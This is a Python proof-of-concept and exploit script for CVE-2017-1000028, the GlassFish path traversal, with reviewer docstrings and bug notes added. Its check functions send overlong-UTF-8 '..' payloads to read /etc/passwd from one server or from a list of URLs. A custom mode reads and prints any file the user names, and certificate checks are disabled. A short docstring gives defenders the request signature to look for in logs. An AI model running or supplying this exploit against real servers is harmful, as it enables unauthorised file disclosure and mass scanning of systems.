"""Proof-of-concept checker for CVE-2017-1000028 (GlassFish path traversal).

Every ``check*`` function below issues a single GET whose path begins with
``/theme/META-INF/`` followed by a run of ``%c0%ae%c0%ae/`` segments (overlong
UTF-8 encodings of ``..``) and, for the passwd checks, ends in ``/etc/passwd``.
A response with HTTP 200 whose body contains ``root`` is reported as vulnerable.

For defenders: that same ``/theme/META-INF/`` + ``%c0%ae`` sequence is the
request signature to look for in web-server, proxy and WAF logs; the
``User-Agent`` header is a plain desktop Chrome string and is not distinctive.

Code-quality notes (documented, not changed here):
  * ``from bdb import checkfuncname`` is unused.
  * ``import re`` is shadowed in every ``check*`` function by a local variable
    named ``re`` holding the HTTP response.
  * All network calls use ``verify = False`` and ``urllib3.disable_warnings()``,
    so TLS certificate errors are neither enforced nor reported.
  * Every ``except:`` is bare and ends with ``sys.exit(0)``, so any error
    (including KeyboardInterrupt) prints ``[-]Error.`` and exits "successfully".
"""
from bdb import checkfuncname  # NOTE(review): unused; nothing below references it
import urllib3
import argparse
import sys
import re  # NOTE(review): shadowed by the local ``re`` response variable in each check* function
import requests


def banner() -> None:
    """Print the tool banner and the usage hint for the ``-c`` mode."""
    print("CVE-2017-1000028 POC&EXP BY: NeonNOXXX");
    print("TIPS:The mode -c only can be used in SingleUrl mode.");


def checkSingle(target: str) -> None:
    """Probe one base URL for the traversal and print a vulnerable / not-vulnerable verdict.

    Args:
        target: base URL (scheme + host[:port]). The traversal path is appended
            verbatim, so a trailing ``/`` on ``target`` yields a double slash
            (the commented-out ``target.strip("/")`` below hints at this).

    Side effects:
        Prints the verdict. On any exception prints ``[-]Error.`` and exits the
        process with status 0 (bare ``except``).
    """
    headers = {
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36'
    }
    # Traversal path: repeated overlong-UTF-8 ".." segments, then /etc/passwd.
    payload = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
    urllib3.disable_warnings()  # silence InsecureRequestWarning caused by verify = False
    try:
        # Local ``re`` shadows the imported ``re`` module for the rest of this function.
        re = requests.get(target + payload,headers = headers,verify = False)
        print('[+]Proving on target : ',target)
        # Success indicator: 200 plus "root" in the body, i.e. passwd content came back.
        if re.status_code == 200 and 'root' in re.text:
            print(target + ' is vulnerable.')
            #print(re.text)
        else:
            print(target + ' is not vulnerable.')
    except:
        print('[-]Error.')
        sys.exit(0)
    #re1 = requests.get(target.strip("/") + payload,headers = headers,verify = True)
    #print(re1.text)


def checkSingleText(target: str) -> None:
    """Same probe as :func:`checkSingle`, but also prints the response body on success.

    Args:
        target: base URL; the traversal path is appended verbatim (see checkSingle).

    Side effects:
        Prints the verdict and, when vulnerable, the full response text. On any
        exception prints ``[-]Error.`` and exits with status 0.
    """
    headers = {
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36'
    }
    payload = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
    urllib3.disable_warnings()  # silence InsecureRequestWarning caused by verify = False
    try:
        # Local ``re`` shadows the imported ``re`` module.
        re = requests.get(target + payload,headers = headers,verify = False)
        print('[+]Proving on target : ',target)
        if re.status_code == 200 and 'root' in re.text:
            print('[+]' + target + ' is vulnerable.')
            print(re.text)  # the only mode that echoes the retrieved file
        else:
            print('[+]' + target + ' is not vulnerable.')
    except:
        print('[-]Error.')
        sys.exit(0)
    #re1 = requests.get(target.strip("/") + payload,headers = headers,verify = True)
    #print(re1.text)


def checkBunch(file: str) -> None:
    """Run the passwd probe against every line of a text file of base URLs.

    Args:
        file: path to a text file with one base URL per line. Only the trailing
            ``'\\n'`` is stripped from each line; nothing else is normalised.

    Side effects:
        Prints one verdict per line. The ``try`` wraps a single request, and the
        bare ``except`` calls ``sys.exit(0)``, so the first error ends the whole
        run rather than continuing with the remaining lines.
    """
    headers = {
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36'
    }
    payload = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
    print('[+]Proving...')
    urllib3.disable_warnings()  # silence InsecureRequestWarning caused by verify = False
    with open(file,'r') as f:
        target = f.readlines()
    for t in target:
        t = t.strip('\n')
        try:
            # Local ``re`` shadows the imported ``re`` module.
            re = requests.get(t + payload,headers = headers,verify = False)
            if re.status_code == 200 and 'root' in re.text:
                print('[+]' + t + ' is vulnerable.')
            else:
                print('[+]' + t + ' is not vulnerable.')
        except:
            print('[-]Error.')
            sys.exit(0)


def checkCustom(target: str,custom: str) -> None:
    """Request an arbitrary path through the traversal and print the body on HTTP 200.

    Args:
        target: base URL (scheme + host[:port]).
        custom: path appended directly after the last traversal segment. The
            traversal string ends without a ``/``, so ``custom`` must start with
            one to form a valid absolute path.

    Side effects:
        Prints the response text on 200, otherwise ``Cannot read this file.``.
        On any exception prints ``[-]Error.`` and exits with status 0.
    """
    headers = {
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36'
    }
    # Unlike the passwd checks, the full URL (target included) is built here.
    payload = target + '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae' + custom
    #print(payload)
    urllib3.disable_warnings()  # silence InsecureRequestWarning caused by verify = False
    try:
        # Local ``re`` shadows the imported ``re`` module.
        re = requests.get(payload,headers = headers,verify = False)
        # No content check here: any 200 is treated as a successful read.
        if re.status_code == 200:
            print(re.text)
        else:
            print('Cannot read this file.')
    except:
        print('[-]Error.')
        sys.exit(0)


if __name__ == "__main__":
    banner();
    # NOTE(review): the CVE id in this description is missing a zero compared with
    # the banner (CVE-2017-1000028), and "Arbitary" is a typo.
    parser = argparse.ArgumentParser(description = 'GlassFish Arbitary File Reading(CVE-2017-100028)')
    parser.add_argument('-u',action = "store",dest = "url",help = "Single Target URL")  # action="store": only stores the argument value
    parser.add_argument('-ut',action = "store",dest = "url_text",help = "Output the passwd file of this Single Target URL")  # action="store": only stores the argument value
    parser.add_argument('-f',action = "store",dest = "file",help = "Read ftom url.txt")  # "required=True": would make the argument mandatory (not set here); "ftom" is a typo
    parser.add_argument('-c',action = "store",dest = "custom",help = "Read the Custom File.")  # "required=True": would make the argument mandatory (not set here)
    args_opt, _ = parser.parse_known_args()  # NOTE(review): result is never used; parse_args() below does the real parsing
    args = parser.parse_args()
    urllib3.disable_warnings()
    if not args.url and not args.file and not args.url_text and not args.custom:
        # NOTE(review): the message says "-uc", but the option defined above is "-ut".
        print("Please spectified one option(-h / -u URL / -uc url customfilepath / -f url.txt / -c The file you want to read.).")
        sys.exit(1)
    if args.url:
        checkSingle(args.url)
    if args.file:
        checkBunch(args.file)
    if args.url_text:
        checkSingleText(args.url_text);
    # -c is only honoured together with -u; ``-c`` alone passes the guard above
    # but runs nothing. With both given, checkSingle runs first, then checkCustom.
    if args.url and args.custom:
        checkCustom(args.url,args.custom)
#payload:/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd ###